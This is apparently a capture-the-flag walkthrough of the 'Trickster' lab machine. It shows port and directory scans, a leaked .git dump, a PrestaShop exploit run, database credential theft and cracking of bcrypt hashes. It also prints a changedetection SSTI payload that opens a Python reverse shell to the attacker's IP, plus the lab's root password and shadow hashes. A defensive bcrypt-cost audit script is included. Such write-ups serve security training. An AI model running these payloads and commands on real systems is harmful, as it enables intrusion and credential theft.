Basic Information

Port Scan

22 and 80:

$ nmap -sC -sV -Pn 10.10.11.34
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-23 13:32 CST
Nmap scan report for 10.10.11.34
Host is up (0.097s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_ 256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://trickster.htb/
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.03 seconds

80

A hosts entry needs to be added:

10.10.11.34 trickster.htb

A corporate homepage; the SHOP link points to a subdomain:

SHOP

After adding the hosts entry and visiting it, there is an online store; the footer shows it runs PrestaShop:

Directory Scan

A routine directory scan finds nothing much on the main site, but the shop reveals a leaked .git directory:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://trickster.htb/  --exclude-length 278

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://shop.trickster.htb/ --exclude-length 283

/.git/HEAD (Status: 200) [Size: 28]

git

So dump it and inspect it:

git-dumper http://shop.trickster.htb/.git/ shop_git

This yields the admin path; visiting it also reveals PrestaShop version 8.1.5:

admin634ewutrx1jgitlooaj

prestashop

A search turns up a relevant vulnerability:

Adjust the paths, ports and similar values in the code to match the target, replace the shell PHP inside the zip file, then run the exploit and wait for it to trigger, which gives a www-data shell:

python3 exploit.py http://shop.trickster.htb miao@miao.com miao exploit.html

Information

Then the usual file browsing yields the database credentials:

/var/www/prestashop/app/config/parameters.php

'database_host' => '127.0.0.1',
'database_port' => '',
'database_name' => 'prestashop',
'database_user' => 'ps_user',
'database_password' => 'prest@shop_o',

Digging further through the database yields some hashes:

mysql --user=ps_user --password='prest@shop_o' prestashop -e "select email,passwd from ps_employee"

admin@trickster.htb $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C
james@trickster.htb $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm

James's hash can be cracked to recover the password:

sudo hashcat -m 3200 hash.txt ~/Tools/dict/rockyou.txt

alwaysandforever
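Why james's hash falls to rockyou in seconds while the admin one does not is visible in the hash prefixes above: james's bcrypt string uses cost factor 04, the admin's uses 10, so each guess against james costs 64 times less work. As an added example that is not part of this writeup, the audit below parses the ps_employee output from above and flags such weak hashes; the MIN_COST threshold and the legacy non-bcrypt row are assumptions constructed for the demo.

```python
import re

# Modern bcrypt string: $2a$/$2b$/$2x$/$2y$, two-digit cost, 22-char salt + 31-char digest
BCRYPT_RE = re.compile(r"^\$(2[abxy])\$(\d{2})\$([./A-Za-z0-9]{53})$")
MIN_COST = 10  # audit threshold chosen for this example, not a PrestaShop setting


def parse_bcrypt(h):
    """Return (variant, cost) for a bcrypt hash, or None if it is not bcrypt."""
    m = BCRYPT_RE.match(h.strip())
    if not m:
        return None
    return m.group(1), int(m.group(2))


def audit_employee_hashes(dump, min_cost=MIN_COST):
    """Parse 'email passwd' lines as printed by mysql -e and flag weak hashes.

    Returns a list of (email, finding) tuples; acceptable hashes get 'ok'.
    """
    findings = []
    for line in dump.strip().splitlines():
        parts = line.split()
        if len(parts) != 2 or parts[0] == "email":  # skip header and blank lines
            continue
        email, h = parts
        parsed = parse_bcrypt(h)
        if parsed is None:
            findings.append((email, "not bcrypt: rehash on next login"))
            continue
        variant, cost = parsed
        if cost < min_cost:
            # Every cost step doubles the work, so the gap is 2**(min_cost - cost)
            factor = 2 ** (min_cost - cost)
            findings.append((email, f"weak cost {cost} ({factor}x cheaper than cost {min_cost})"))
        else:
            findings.append((email, "ok"))
    return findings


# The two rows from the ps_employee query in the writeup plus one constructed legacy row
SAMPLE_DUMP = """
email passwd
admin@trickster.htb $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C
james@trickster.htb $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm
legacy@example.test 0123456789abcdef0123456789abcdef
"""

if __name__ == "__main__":
    for email, finding in audit_employee_hashes(SAMPLE_DUMP):
        print(f"{email}: {finding}")
```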

user flag

James reuses this password, so log in over SSH:

Docker

Checking the IP addresses reveals a Docker interface at 172.17.0.1; enumerating Docker finds port 5000 on 172.17.0.1, so forward it out and take a look:

ssh james@10.10.11.34 -L 5555:172.17.0.2:5000

It is changedetection 0.45.20, and James's password logs in:

changedetection

A search turns up the changedetection vulnerability:

The script has no option for a password, so follow its code and exploit manually:

Add a new watch -> edit & watch, set the monitored URL to the host machine so we can control the change later, e.g. http://172.17.0.1:8000

Set the notification URL to get://10.10.14.9 and the notification body to the SSTI payload:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.9\",4445));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}{% endif %}{% endfor %}

Save the settings, go to the listener we set up on port 8000 on the host and make any change, then return to the watch and recheck the site; this triggers the SSTI and gives root inside the container:

Privilege Escalation Info & root flag

The shell history inside the container shows what looks like a password; it is the host's root password:

#YouC4ntCatchMe#

shadow

root:$y$j9T$QrqZSRjwrjBfK8HexlK4d/$ng0E/9GWnWgXHLc1TSOBShK3ykz95fGBSVzzw6tiQl2:19968:0:99999:7:::
james:$y$j9T$nFUssQJghJkY44BaQM2aD1$E9pJTfQ5CwEkaU/7O07HAh.4UsM1lOhKHqyRP1XEtL4:19868:0:99999:7:::
adam:$y$j9T$BUeIuw29kb15rDAz8ZXOt/$WG54Q2KcL9UI.zK0r2WaeXb6zUQioT1HBxJ0TfjF736:19868:0:99999:7:::
runner:$y$j9T$1GBk1cQSxkwCXeThdrzvp.$.q2JbGTK0oFJG0aMtLjaVoRiv5419bO0gOC9mTJO2iB:19975:0:99999:7:::

References